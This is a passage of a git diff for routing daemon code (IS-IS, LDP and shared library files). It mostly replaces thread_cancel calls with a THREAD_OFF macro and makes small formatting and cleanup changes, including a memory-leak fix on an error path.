+ THREAD_OFF(circuit->t_send_psnp[idx]);
if (circuit->circ_type == CIRCUIT_T_BROADCAST) {
- thread_cancel(&circuit->u.bc.t_send_lan_hello[idx]);
- thread_cancel(&circuit->u.bc.t_run_dr[idx]);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[idx]);
+ THREAD_OFF(circuit->u.bc.t_send_lan_hello[idx]);
+ THREAD_OFF(circuit->u.bc.t_run_dr[idx]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[idx]);
circuit->lsp_regenerate_pending[idx] = 0;
circuit->u.bc.run_dr_elect[idx] = 0;
circuit->u.bc.is_dr[idx] = 0;
diff --git a/isisd/isis_lfa.c b/isisd/isis_lfa.c
index 800cac8521..c4fadcba03 100644
--- a/isisd/isis_lfa.c
+++ b/isisd/isis_lfa.c
@@ -1519,7 +1519,7 @@ int isis_rlfa_activate(struct isis_spftree *spftree, struct rlfa *rlfa,
spftree->route_table_backup);
spftree->lfa.protection_counters.rlfa[vertex->N.ip.priority] += 1;
- thread_cancel(&area->t_rlfa_rib_update);
+ THREAD_OFF(area->t_rlfa_rib_update);
thread_add_timer(master, isis_area_verify_routes_cb, area, 2,
&area->t_rlfa_rib_update);
@@ -1538,7 +1538,7 @@ void isis_rlfa_deactivate(struct isis_spftree *spftree, struct rlfa *rlfa)
isis_route_delete(area, rn, spftree->route_table_backup);
spftree->lfa.protection_counters.rlfa[vertex->N.ip.priority] -= 1;
- thread_cancel(&area->t_rlfa_rib_update);
+ THREAD_OFF(area->t_rlfa_rib_update);
thread_add_timer(master, isis_area_verify_routes_cb, area, 2,
&area->t_rlfa_rib_update);
}
diff --git a/isisd/isis_lsp.c b/isisd/isis_lsp.c
index 8dbd41b5d9..5387f37039 100644
--- a/isisd/isis_lsp.c
+++ b/isisd/isis_lsp.c
@@ -1390,7 +1390,7 @@ int lsp_generate(struct isis_area *area, int level)
refresh_time = lsp_refresh_time(newlsp, rem_lifetime);
- thread_cancel(&area->t_lsp_refresh[level - 1]);
+ THREAD_OFF(area->t_lsp_refresh[level - 1]);
area->lsp_regenerate_pending[level - 1] = 0;
thread_add_timer(master, lsp_refresh,
&area->lsp_refresh_arg[level - 1], refresh_time,
@@ -1601,7 +1601,7 @@ int _lsp_regenerate_schedule(struct isis_area *area, int level,
"ISIS (%s): Will schedule regen timer. Last run was: %lld, Now is: %lld",
area->area_tag, (long long)lsp->last_generated,
(long long)now);
- thread_cancel(&area->t_lsp_refresh[lvl - 1]);
+ THREAD_OFF(area->t_lsp_refresh[lvl - 1]);
diff = now - lsp->last_generated;
if (diff < area->lsp_gen_interval[lvl - 1]
&& !(area->bfd_signalled_down)) {
@@ -1794,7 +1794,7 @@ int lsp_generate_pseudo(struct isis_circuit *circuit, int level)
lsp_flood(lsp, NULL);
refresh_time = lsp_refresh_time(lsp, rem_lifetime);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[level - 1]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[level - 1]);
circuit->lsp_regenerate_pending[level - 1] = 0;
if (level == IS_LEVEL_1)
thread_add_timer(
@@ -1985,7 +1985,7 @@ int lsp_regenerate_schedule_pseudo(struct isis_circuit *circuit, int level)
"ISIS (%s): Will schedule PSN regen timer. Last run was: %lld, Now is: %lld",
area->area_tag, (long long)lsp->last_generated,
(long long)now);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[lvl - 1]);
+ THREAD_OFF(circuit->u.bc.t_refresh_pseudo_lsp[lvl - 1]);
diff = now - lsp->last_generated;
if (diff < circuit->area->lsp_gen_interval[lvl - 1]) {
timeout =
diff --git a/isisd/isis_pdu.c b/isisd/isis_pdu.c
index b1fbfd5140..47093fdd6b 100644
--- a/isisd/isis_pdu.c
+++ b/isisd/isis_pdu.c
@@ -205,7 +205,7 @@ static int process_p2p_hello(struct iih_info *iih)
adj);
/* lets take care of the expiry */
- thread_cancel(&adj->t_expire);
+ THREAD_OFF(adj->t_expire);
thread_add_timer(master, isis_adj_expire, adj, (long)adj->hold_time,
&adj->t_expire);
@@ -497,7 +497,7 @@ static int process_lan_hello(struct iih_info *iih)
adj);
/* lets take care of the expiry */
- thread_cancel(&adj->t_expire);
+ THREAD_OFF(adj->t_expire);
thread_add_timer(master, isis_adj_expire, adj, (long)adj->hold_time,
&adj->t_expire);
@@ -2064,7 +2064,7 @@ static void _send_hello_sched(struct isis_circuit *circuit,
if (thread_timer_remain_msec(*threadp) < (unsigned long)delay)
return;
- thread_cancel(threadp);
+ THREAD_OFF(*threadp);
}
thread_add_timer_msec(master, send_hello_cb,
diff --git a/isisd/isis_spf.c b/isisd/isis_spf.c
index 3aef8ada24..6be7c2d608 100644
--- a/isisd/isis_spf.c
+++ b/isisd/isis_spf.c
@@ -1938,7 +1938,7 @@ int _isis_spf_schedule(struct isis_area *area, int level,
area->area_tag, level, diff, func, file, line);
}
- thread_cancel(&area->t_rlfa_rib_update);
+ THREAD_OFF(area->t_rlfa_rib_update);
if (area->spf_delay_ietf[level - 1]) {
/* Need to call schedule function also if spf delay is running
* to
diff --git a/isisd/isis_sr.c b/isisd/isis_sr.c
index 107fa71d71..259047ff66 100644
--- a/isisd/isis_sr.c
+++ b/isisd/isis_sr.c
@@ -1180,7 +1180,7 @@ void isis_sr_stop(struct isis_area *area)
area->area_tag);
/* Disable any re-attempt to connect to Label Manager */
- thread_cancel(&srdb->t_start_lm);
+ THREAD_OFF(srdb->t_start_lm);
/* Uninstall all local Adjacency-SIDs. */
for (ALL_LIST_ELEMENTS(area->srdb.adj_sids, node, nnode, sra))
diff --git a/isisd/isis_tlvs.c b/isisd/isis_tlvs.c
index 11be3c3a71..b3c3fd4b0b 100644
--- a/isisd/isis_tlvs.c
+++ b/isisd/isis_tlvs.c
@@ -3580,9 +3580,9 @@ static int pack_tlv_router_cap(const struct isis_router_cap *router_cap,
}
static int unpack_tlv_router_cap(enum isis_tlv_context context,
- uint8_t tlv_type, uint8_t tlv_len,
- struct stream *s, struct sbuf *log,
- void *dest, int indent)
+ uint8_t tlv_type, uint8_t tlv_len,
+ struct stream *s, struct sbuf *log, void *dest,
+ int indent)
{
struct isis_tlvs *tlvs = dest;
struct isis_router_cap *rcap;
@@ -3627,7 +3627,7 @@ static int unpack_tlv_router_cap(enum isis_tlv_context context,
log, indent,
"WARNING: Router Capability subTLV length too large compared to expected size\n");
stream_forward_getp(s, STREAM_READABLE(s));
-
+ XFREE(MTYPE_ISIS_TLV, rcap);
return 0;
}
diff --git a/isisd/isis_tx_queue.c b/isisd/isis_tx_queue.c
index 078329221a..06369c6d70 100644
--- a/isisd/isis_tx_queue.c
+++ b/isisd/isis_tx_queue.c
@@ -92,7 +92,7 @@ static void tx_queue_element_free(void *element)
{
struct isis_tx_queue_entry *e = element;
- thread_cancel(&(e->retry));
+ THREAD_OFF(e->retry);
XFREE(MTYPE_TX_QUEUE_ENTRY, e);
}
@@ -161,7 +161,7 @@ void _isis_tx_queue_add(struct isis_tx_queue *queue,
e->type = type;
- thread_cancel(&(e->retry));
+ THREAD_OFF(e->retry);
thread_add_event(master, tx_queue_send_event, e, 0, &e->retry);
e->is_retry = false;
@@ -184,7 +184,7 @@ void _isis_tx_queue_del(struct isis_tx_queue *queue, struct isis_lsp *lsp,
func, file, line);
}
- thread_cancel(&(e->retry));
+ THREAD_OFF(e->retry);
hash_release(queue->hash, e);
XFREE(MTYPE_TX_QUEUE_ENTRY, e);
diff --git a/isisd/isisd.c b/isisd/isisd.c
index 996a62f4d5..3fd2476ad1 100644
--- a/isisd/isisd.c
+++ b/isisd/isisd.c
@@ -514,10 +514,10 @@ void isis_area_destroy(struct isis_area *area)
if (area->spf_timer[0])
isis_spf_timer_free(THREAD_ARG(area->spf_timer[0]));
- thread_cancel(&area->spf_timer[0]);
+ THREAD_OFF(area->spf_timer[0]);
if (area->spf_timer[1])
isis_spf_timer_free(THREAD_ARG(area->spf_timer[1]));
- thread_cancel(&area->spf_timer[1]);
+ THREAD_OFF(area->spf_timer[1]);
spf_backoff_free(area->spf_delay_ietf[0]);
spf_backoff_free(area->spf_delay_ietf[1]);
@@ -541,10 +541,10 @@ void isis_area_destroy(struct isis_area *area)
isis_lfa_tiebreakers_clear(area, ISIS_LEVEL1);
isis_lfa_tiebreakers_clear(area, ISIS_LEVEL2);
- thread_cancel(&area->t_tick);
- thread_cancel(&area->t_lsp_refresh[0]);
- thread_cancel(&area->t_lsp_refresh[1]);
- thread_cancel(&area->t_rlfa_rib_update);
+ THREAD_OFF(area->t_tick);
+ THREAD_OFF(area->t_lsp_refresh[0]);
+ THREAD_OFF(area->t_lsp_refresh[1]);
+ THREAD_OFF(area->t_rlfa_rib_update);
thread_cancel_event(master, area);
@@ -3094,12 +3094,12 @@ static void area_resign_level(struct isis_area *area, int level)
if (area->spf_timer[level - 1])
isis_spf_timer_free(THREAD_ARG(area->spf_timer[level - 1]));
- thread_cancel(&area->spf_timer[level - 1]);
+ THREAD_OFF(area->spf_timer[level - 1]);
sched_debug(
"ISIS (%s): Resigned from L%d - canceling LSP regeneration timer.",
area->area_tag, level);
- thread_cancel(&area->t_lsp_refresh[level - 1]);
+ THREAD_OFF(area->t_lsp_refresh[level - 1]);
area->lsp_regenerate_pending[level - 1] = 0;
}
diff --git a/ldpd/accept.c b/ldpd/accept.c
index 2999a35c06..1a04c563c1 100644
--- a/ldpd/accept.c
+++ b/ldpd/accept.c
@@ -72,7 +72,7 @@ accept_del(int fd)
LIST_FOREACH(av, &accept_queue.queue, entry)
if (av->fd == fd) {
log_debug("%s: %d removed from queue", __func__, fd);
- thread_cancel(&av->ev);
+ THREAD_OFF(av->ev);
LIST_REMOVE(av, entry);
free(av);
return;
@@ -92,7 +92,7 @@ accept_unpause(void)
{
if (accept_queue.evt != NULL) {
log_debug(__func__);
- thread_cancel(&accept_queue.evt);
+ THREAD_OFF(accept_queue.evt);
accept_arm();
}
}
@@ -111,7 +111,7 @@ accept_unarm(void)
{
struct accept_ev *av;
LIST_FOREACH(av, &accept_queue.queue, entry)
- thread_cancel(&av->ev);
+ THREAD_OFF(av->ev);
}
static void accept_cb(struct thread *thread)
diff --git a/ldpd/adjacency.c b/ldpd/adjacency.c
index bbc8a277a6..8caa3c4e24 100644
--- a/ldpd/adjacency.c
+++ b/ldpd/adjacency.c
@@ -196,7 +196,7 @@ static void adj_itimer(struct thread *thread)
void
adj_start_itimer(struct adj *adj)
{
- thread_cancel(&adj->inactivity_timer);
+ THREAD_OFF(adj->inactivity_timer);
adj->inactivity_timer = NULL;
thread_add_timer(master, adj_itimer, adj, adj->holdtime,
&adj->inactivity_timer);
@@ -205,7 +205,7 @@ adj_start_itimer(struct adj *adj)
void
adj_stop_itimer(struct adj *adj)
{
- thread_cancel(&adj->inactivity_timer);
+ THREAD_OFF(adj->inactivity_timer);
}
/* targeted neighbors */
@@ -354,7 +354,7 @@ static void tnbr_hello_timer(struct thread *thread)
static void
tnbr_start_hello_timer(struct tnbr *tnbr)
{
- thread_cancel(&tnbr->hello_timer);
+ THREAD_OFF(tnbr->hello_timer);
tnbr->hello_timer = NULL;
thread_add_timer(master, tnbr_hello_timer, tnbr, tnbr_get_hello_interval(tnbr),
&tnbr->hello_timer);
@@ -363,7 +363,7 @@ tnbr_start_hello_timer(struct tnbr *tnbr)
static void
tnbr_stop_hello_timer(struct tnbr *tnbr)
{
- thread_cancel(&tnbr->hello_timer);
+ THREAD_OFF(tnbr->hello_timer);
}
struct ctl_adj *
@@ -386,7 +386,7 @@ adj_to_ctl(struct adj *adj)
}
actl.holdtime = adj->holdtime;
actl.holdtime_remaining =
- thread_timer_remain_second(adj->inactivity_timer);
+ thread_timer_remain_second(adj->inactivity_timer);
actl.trans_addr = adj->trans_addr;
actl.ds_tlv = adj->ds_tlv;
diff --git a/ldpd/control.c b/ldpd/control.c
index 376f488bd1..09e91217ae 100644
--- a/ldpd/control.c
+++ b/ldpd/control.c
@@ -180,8 +180,8 @@ control_close(int fd)
msgbuf_clear(&c->iev.ibuf.w);
TAILQ_REMOVE(&ctl_conns, c, entry);
- thread_cancel(&c->iev.ev_read);
- thread_cancel(&c->iev.ev_write);
+ THREAD_OFF(c->iev.ev_read);
+ THREAD_OFF(c->iev.ev_write);
close(c->iev.ibuf.fd);
accept_unpause();
free(c);
diff --git a/ldpd/interface.c b/ldpd/interface.c
index af6e8fd7ec..392e25470f 100644
--- a/ldpd/interface.c
+++ b/ldpd/interface.c
@@ -467,7 +467,7 @@ static void if_hello_timer(struct thread *thread)
static void
if_start_hello_timer(struct iface_af *ia)
{
- thread_cancel(&ia->hello_timer);
+ THREAD_OFF(ia->hello_timer);
thread_add_timer(master, if_hello_timer, ia, if_get_hello_interval(ia),
&ia->hello_timer);
}
@@ -475,7 +475,7 @@ if_start_hello_timer(struct iface_af *ia)
static void
if_stop_hello_timer(struct iface_af *ia)
{
- thread_cancel(&ia->hello_timer);
+ THREAD_OFF(ia->hello_timer);
}
struct ctl_iface *
@@ -543,11 +543,8 @@ ldp_sync_to_ctl(struct iface *iface)
ictl.wait_time = if_get_wait_for_sync_interval();
ictl.timer_running = iface->ldp_sync.wait_for_sync_timer ? true : false;
- if (iface->ldp_sync.wait_for_sync_timer)
- ictl.wait_time_remaining =
+ ictl.wait_time_remaining =
thread_timer_remain_second(iface->ldp_sync.wait_for_sync_timer);
- else
- ictl.wait_time_remaining = 0;
memset(&ictl.peer_ldp_id, 0, sizeof(ictl.peer_ldp_id));
diff --git a/ldpd/lde.c b/ldpd/lde.c
index 9d1daabbe9..efc07b4547 100644
--- a/ldpd/lde.c
+++ b/ldpd/lde.c
@@ -417,8 +417,8 @@ static void lde_dispatch_imsg(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
lde_shutdown();
}
}
@@ -702,8 +702,8 @@ static void lde_dispatch_parent(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
lde_shutdown();
}
}
diff --git a/ldpd/lde_lib.c b/ldpd/lde_lib.c
index 1ade3c5378..4366560546 100644
--- a/ldpd/lde_lib.c
+++ b/ldpd/lde_lib.c
@@ -1068,7 +1068,7 @@ void lde_gc_timer(struct thread *thread)
void
lde_gc_start_timer(void)
{
- thread_cancel(&gc_timer);
+ THREAD_OFF(gc_timer);
thread_add_timer(master, lde_gc_timer, NULL, LDE_GC_INTERVAL,
&gc_timer);
}
@@ -1076,5 +1076,5 @@ lde_gc_start_timer(void)
void
lde_gc_stop_timer(void)
{
- thread_cancel(&gc_timer);
+ THREAD_OFF(gc_timer);
}
diff --git a/ldpd/ldpd.c b/ldpd/ldpd.c
index 796cf11798..87d78afa25 100644
--- a/ldpd/ldpd.c
+++ b/ldpd/ldpd.c
@@ -616,8 +616,8 @@ static void main_dispatch_ldpe(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
ldpe_pid = 0;
if (lde_pid == 0)
ldpd_shutdown();
@@ -721,8 +721,8 @@ static void main_dispatch_lde(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
lde_pid = 0;
if (ldpe_pid == 0)
ldpd_shutdown();
@@ -744,8 +744,8 @@ void ldp_write_handler(struct thread *thread)
fatal("msgbuf_write");
if (n == 0) {
/* this pipe is dead, so remove the event handlers */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
return;
}
@@ -829,7 +829,7 @@ void evbuf_init(struct evbuf *eb, int fd, void (*handler)(struct thread *),
void
evbuf_clear(struct evbuf *eb)
{
- thread_cancel(&eb->ev);
+ THREAD_OFF(eb->ev);
msgbuf_clear(&eb->wbuf);
eb->wbuf.fd = -1;
}
diff --git a/ldpd/ldpe.c b/ldpd/ldpe.c
index 29abd420e5..792dcb2f2a 100644
--- a/ldpd/ldpe.c
+++ b/ldpd/ldpe.c
@@ -212,7 +212,7 @@ ldpe_shutdown(void)
#ifdef __OpenBSD__
if (sysdep.no_pfkey == 0) {
- thread_cancel(&pfkey_ev);
+ THREAD_OFF(pfkey_ev);
close(global.pfkeysock);
}
#endif
@@ -626,8 +626,8 @@ static void ldpe_dispatch_main(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
ldpe_shutdown();
}
}
@@ -762,8 +762,8 @@ static void ldpe_dispatch_lde(struct thread *thread)
imsg_event_add(iev);
else {
/* this pipe is dead, so remove the event handlers and exit */
- thread_cancel(&iev->ev_read);
- thread_cancel(&iev->ev_write);
+ THREAD_OFF(iev->ev_read);
+ THREAD_OFF(iev->ev_write);
ldpe_shutdown();
}
}
@@ -813,14 +813,14 @@ ldpe_close_sockets(int af)
af_global = ldp_af_global_get(&global, af);
/* discovery socket */
- thread_cancel(&af_global->disc_ev);
+ THREAD_OFF(af_global->disc_ev);
if (af_global->ldp_disc_socket != -1) {
close(af_global->ldp_disc_socket);
af_global->ldp_disc_socket = -1;
}
/* extended discovery socket */
- thread_cancel(&af_global->edisc_ev);
+ THREAD_OFF(af_global->edisc_ev);
if (af_global->ldp_edisc_socket != -1) {
close(af_global->ldp_edisc_socket);
af_global->ldp_edisc_socket = -1;
diff --git a/ldpd/neighbor.c b/ldpd/neighbor.c
index 867ad92e47..e1db9e8e1e 100644
--- a/ldpd/neighbor.c
+++ b/ldpd/neighbor.c
@@ -307,7 +307,7 @@ nbr_del(struct nbr *nbr)
nbr->auth.method = AUTH_NONE;
if (nbr_pending_connect(nbr))
- thread_cancel(&nbr->ev_connect);
+ THREAD_OFF(nbr->ev_connect);
nbr_stop_ktimer(nbr);
nbr_stop_ktimeout(nbr);
nbr_stop_itimeout(nbr);
@@ -435,7 +435,7 @@ nbr_start_ktimer(struct nbr *nbr)
/* send three keepalives per period */
secs = nbr->keepalive / KEEPALIVE_PER_PERIOD;
- thread_cancel(&nbr->keepalive_timer);
+ THREAD_OFF(nbr->keepalive_timer);
nbr->keepalive_timer = NULL;
thread_add_timer(master, nbr_ktimer, nbr, secs, &nbr->keepalive_timer);
}
@@ -443,7 +443,7 @@ nbr_start_ktimer(struct nbr *nbr)
void
nbr_stop_ktimer(struct nbr *nbr)
{
- thread_cancel(&nbr->keepalive_timer);
+ THREAD_OFF(nbr->keepalive_timer);
}
/* Keepalive timeout: if the nbr hasn't sent keepalive */
@@ -462,7 +462,7 @@ static void nbr_ktimeout(struct thread *thread)
static void
nbr_start_ktimeout(struct nbr *nbr)
{
- thread_cancel(&nbr->keepalive_timeout);
+ THREAD_OFF(nbr->keepalive_timeout);
nbr->keepalive_timeout = NULL;
thread_add_timer(master, nbr_ktimeout, nbr, nbr->keepalive,
&nbr->keepalive_timeout);
@@ -471,7 +471,7 @@ nbr_start_ktimeout(struct nbr *nbr)
void
nbr_stop_ktimeout(struct nbr *nbr)
{
- thread_cancel(&nbr->keepalive_timeout);
+ THREAD_OFF(nbr->keepalive_timeout);
}
/* Session initialization timeout: if nbr got stuck in the initialization FSM */
@@ -491,7 +491,7 @@ nbr_start_itimeout(struct nbr *nbr)
int secs;
secs = INIT_FSM_TIMEOUT;
- thread_cancel(&nbr->init_timeout);
+ THREAD_OFF(nbr->init_timeout);
nbr->init_timeout = NULL;
thread_add_timer(master, nbr_itimeout, nbr, secs, &nbr->init_timeout);
}
@@ -499,7 +499,7 @@ nbr_start_itimeout(struct nbr *nbr)
void
nbr_stop_itimeout(struct nbr *nbr)
{
- thread_cancel(&nbr->init_timeout);
+ THREAD_OFF(nbr->init_timeout);
}
/* Init delay timer: timer to retry to iniziatize session */
@@ -537,7 +537,7 @@ nbr_start_idtimer(struct nbr *nbr)
break;
}
- thread_cancel(&nbr->initdelay_timer);
+ THREAD_OFF(nbr->initdelay_timer);
nbr->initdelay_timer = NULL;
thread_add_timer(master, nbr_idtimer, nbr, secs,
&nbr->initdelay_timer);
@@ -546,7 +546,7 @@ nbr_start_idtimer(struct nbr *nbr)
void
nbr_stop_idtimer(struct nbr *nbr)
{
- thread_cancel(&nbr->initdelay_timer);
+ THREAD_OFF(nbr->initdelay_timer);
}
int
@@ -847,11 +847,8 @@ nbr_to_ctl(struct nbr *nbr)
nctl.stats = nbr->stats;
nctl.flags = nbr->flags;
nctl.max_pdu_len = nbr->max_pdu_len;
- if (nbr->keepalive_timer)
- nctl.hold_time_remaining =
- thread_timer_remain_second(nbr->keepalive_timer);
- else
- nctl.hold_time_remaining = 0;
+ nctl.hold_time_remaining =
+ thread_timer_remain_second(nbr->keepalive_timer);
gettimeofday(&now, NULL);
if (nbr->state == NBR_STA_OPER) {
diff --git a/ldpd/packet.c b/ldpd/packet.c
index 707878ca9f..2cca52461f 100644
--- a/ldpd/packet.c
+++ b/ldpd/packet.c
@@ -651,7 +651,7 @@ session_shutdown(struct nbr *nbr, uint32_t status, uint32_t msg_id,
switch (nbr->state) {
case NBR_STA_PRESENT:
if (nbr_pending_connect(nbr))
- thread_cancel(&nbr->ev_connect);
+ THREAD_OFF(nbr->ev_connect);
break;
case NBR_STA_INITIAL:
case NBR_STA_OPENREC:
@@ -756,7 +756,7 @@ tcp_close(struct tcp_conn *tcp)
evbuf_clear(&tcp->wbuf);
if (tcp->nbr) {
- thread_cancel(&tcp->rev);
+ THREAD_OFF(tcp->rev);
free(tcp->rbuf);
tcp->nbr->tcp = NULL;
}
@@ -788,7 +788,7 @@ pending_conn_new(int fd, int af, union ldpd_addr *addr)
void
pending_conn_del(struct pending_conn *pconn)
{
- thread_cancel(&pconn->ev_timeout);
+ THREAD_OFF(pconn->ev_timeout);
TAILQ_REMOVE(&global.pending_conns, pconn, entry);
free(pconn);
}
diff --git a/lib/agentx.c b/lib/agentx.c
index 821c573fb2..4c087219cb 100644
--- a/lib/agentx.c
+++ b/lib/agentx.c
@@ -118,7 +118,6 @@ static void agentx_events_update(void)
snmp_select_info(&maxfd, &fds, &timeout, &block);
if (!block) {
- timeout_thr = NULL;
thread_add_timer_tv(agentx_tm, agentx_timeout, NULL, &timeout,
&timeout_thr);
}
@@ -147,9 +146,9 @@ static void agentx_events_update(void)
else if (FD_ISSET(fd, &fds)) {
struct listnode *newln;
thr = XCALLOC(MTYPE_TMP, sizeof(struct thread *));
- thread_add_read(agentx_tm, agentx_read, NULL, fd, thr);
+
newln = listnode_add_before(events, ln, thr);
- (*thr)->arg = newln;
+ thread_add_read(agentx_tm, agentx_read, newln, fd, thr);
}
}
diff --git a/lib/ferr.c b/lib/ferr.c
index 9d79f38b7c..bef7f3b209 100644
--- a/lib/ferr.c
+++ b/lib/ferr.c
@@ -84,7 +84,7 @@ void log_ref_add(struct log_ref *ref)
{
uint32_t i = 0;
- frr_with_mutex(&refs_mtx) {
+ frr_with_mutex (&refs_mtx) {
while (ref[i].code != END_FERR) {
(void)hash_get(refs, &ref[i], hash_alloc_intern);
i++;
@@ -98,7 +98,7 @@ struct log_ref *log_ref_get(uint32_t code)
struct log_ref *ref;
holder.code = code;
- frr_with_mutex(&refs_mtx) {
+ frr_with_mutex (&refs_mtx) {
ref = hash_lookup(refs, &holder);
}
@@ -115,7 +115,7 @@ void log_ref_display(struct vty *vty, uint32_t code, bool json)
if (json)
top = json_object_new_object();
- frr_with_mutex(&refs_mtx) {
+ frr_with_mutex (&refs_mtx) {
errlist = code ? list_new() : hash_to_list(refs);
}
@@ -182,7 +182,7 @@ DEFUN_NOSH(show_error_code,
void log_ref_init(void)
{
- frr_with_mutex(&refs_mtx) {
+ frr_with_mutex (&refs_mtx) {
refs = hash_create(ferr_hash_key, ferr_hash_cmp,
"Error Reference Texts");
}
@@ -190,7 +190,7 @@ void log_ref_init(void)
void log_ref_fini(void)
{
- frr_with_mutex(&refs_mtx) {
+ frr_with_mutex (&refs_mtx) {
hash_clean(refs, NULL);
hash_free(refs);
refs = NULL;
diff --git a/lib/frr_pthread.c b/lib/frr_pthread.c
index 0f56fbac83..dd675bbb85 100644
--- a/lib/frr_pthread.c
+++ b/lib/frr_pthread.c
@@ -55,7 +55,7 @@ static struct list *frr_pthread_list;
void frr_pthread_init(void)
{
- frr_with_mutex(&frr_pthread_list_mtx) {
+ frr_with_mutex (&frr_pthread_list_mtx) {
frr_pthread_list = list_new();
}
}
@@ -64,7 +64,7 @@ void frr_pthread_finish(void)
{
frr_pthread_stop_all();
- frr_with_mutex(&frr_pthread_list_mtx) {
+ frr_with_mutex (&frr_pthread_list_mtx) {
struct listnode *n, *nn;
struct frr_pthread *fpt;
@@ -105,7 +105,7 @@ struct frr_pthread *frr_pthread_new(const struct frr_pthread_attr *attr,
pthread_mutex_init(fpt->running_cond_mtx, NULL);
pthread_cond_init(fpt->running_cond, NULL);
- frr_with_mutex(&frr_pthread_list_mtx) {
+ frr_with_mutex (&frr_pthread_list_mtx) {
listnode_add(frr_pthread_list, fpt);
}
@@ -126,7 +126,7 @@ static void frr_pthread_destroy_nolock(struct frr_pthread *fpt)
void frr_pthread_destroy(struct frr_pthread *fpt)
{
- frr_with_mutex(&frr_pthread_list_mtx) {
+ frr_with_mutex (&frr_pthread_list_mtx) {
listnode_delete(frr_pthread_list, fpt);
}
@@ -193,7 +193,7 @@ int frr_pthread_run(struct frr_pthread *fpt, const pthread_attr_t *attr)
void frr_pthread_wait_running(struct frr_pthread *fpt)
{
- frr_with_mutex(fpt->running_cond_mtx) {
+ frr_with_mutex (fpt->running_cond_mtx) {
while (!fpt->running)
pthread_cond_wait(fpt->running_cond,
fpt->running_cond_mtx);
@@ -202,7 +202,7 @@ void frr_pthread_wait_running(struct frr_pthread *fpt)
void frr_pthread_notify_running(struct frr_pthread *fpt)
{
- frr_with_mutex(fpt->running_cond_mtx) {
+ frr_with_mutex (fpt->running_cond_mtx) {
fpt->running = true;
pthread_cond_signal(fpt->running_cond);
}
@@ -219,7 +219,7 @@ int frr_pthread_stop(struct frr_pthread *fpt, void **result)
void frr_pthread_stop_all(void)
{
- frr_with_mutex(&frr_pthread_list_mtx) {
+ frr_with_mutex (&frr_pthread_list_mtx) {
struct listnode *n;
struct frr_pthread *fpt;
for (ALL_LIST_ELEMENTS_RO(frr_pthread_list, n, fpt)) {
diff --git a/lib/hash.c b/lib/hash.c
index e9132f7907..4b371b43ab 100644
--- a/lib/hash.c
+++ b/lib/hash.c
@@ -56,7 +56,7 @@ struct hash *hash_create_size(unsigned int size,
hash->name = name ? XSTRDUP(MTYPE_HASH, name) : NULL;
hash->stats.empty = hash->size;
- frr_with_mutex(&_hashes_mtx) {
+ frr_with_mutex (&_hashes_mtx) {
if (!_hashes)
_hashes = list_new();
@@ -329,7 +329,7 @@ struct list *hash_to_list(struct hash *hash)
void hash_free(struct hash *hash)
{
- frr_with_mutex(&_hashes_mtx) {
+ frr_with_mutex (&_hashes_mtx) {
if (_hashes) {
listnode_delete(_hashes, hash);
if (_hashes->count == 0) {
diff --git a/lib/log_filter.c b/lib/log_filter.c
index f01497dead..df74a8c9ba 100644
--- a/lib/log_filter.c
+++ b/lib/log_filter.c
@@ -43,14 +43,14 @@ static int zlog_filter_lookup(const char *lookup)
void zlog_filter_clear(void)
{
- frr_with_mutex(&logfilterlock) {
+ frr_with_mutex (&logfilterlock) {
zlog_filter_count = 0;
}
}
int zlog_filter_add(const char *filter)
{
- frr_with_mutex(&logfilterlock) {
+ frr_with_mutex (&logfilterlock) {
if (zlog_filter_count >= ZLOG_FILTERS_MAX)
return 1;
@@ -74,7 +74,7 @@ int zlog_filter_add(const char *filter)
int zlog_filter_del(const char *filter)
{
- frr_with_mutex(&logfilterlock) {
+ frr_with_mutex (&logfilterlock) {
int found_idx = zlog_filter_lookup(filter);
int last_idx = zlog_filter_count - 1;
@@ -96,7 +96,7 @@ int zlog_filter_dump(char *buf, size_t max_size)
{
int len = 0;
- frr_with_mutex(&logfilterlock) {
+ frr_with_mutex (&logfilterlock) {
for (int i = 0; i < zlog_filter_count; i++) {
int ret;
@@ -115,7 +115,7 @@ static int search_buf(const char *buf, size_t len)
{
char *found = NULL;
- frr_with_mutex(&logfilterlock) {
+ frr_with_mutex (&logfilterlock) {
for (int i = 0; i < zlog_filter_count; i++) {
found = memmem(buf, len, zlog_filters[i],
strlen(zlog_filters[i]));
diff --git a/lib/northbound_grpc.cpp b/lib/northbound_grpc.cpp
index 9cb999110b..95721ffc77 100644
--- a/lib/northbound_grpc.cpp
+++ b/lib/northbound_grpc.cpp
@@ -198,7 +198,7 @@ class RpcStateBase
static void c_callback(struct thread *thread)
{
- auto _tag = static_cast<RpcStateBase *>(thread->arg);
+ auto _tag = static_cast<RpcStateBase *>(THREAD_ARG(thread));
/*
* We hold the lock until the callback finishes and has updated
* _tag->state, then we signal done and release.
diff --git a/lib/privs.c b/lib/privs.c
index 5cba90839f..71416beebe 100644
--- a/lib/privs.c
+++ b/lib/privs.c
@@ -488,7 +488,7 @@ struct zebra_privs_t *_zprivs_raise(struct zebra_privs_t *privs,
* Serialize 'raise' operations; particularly important for
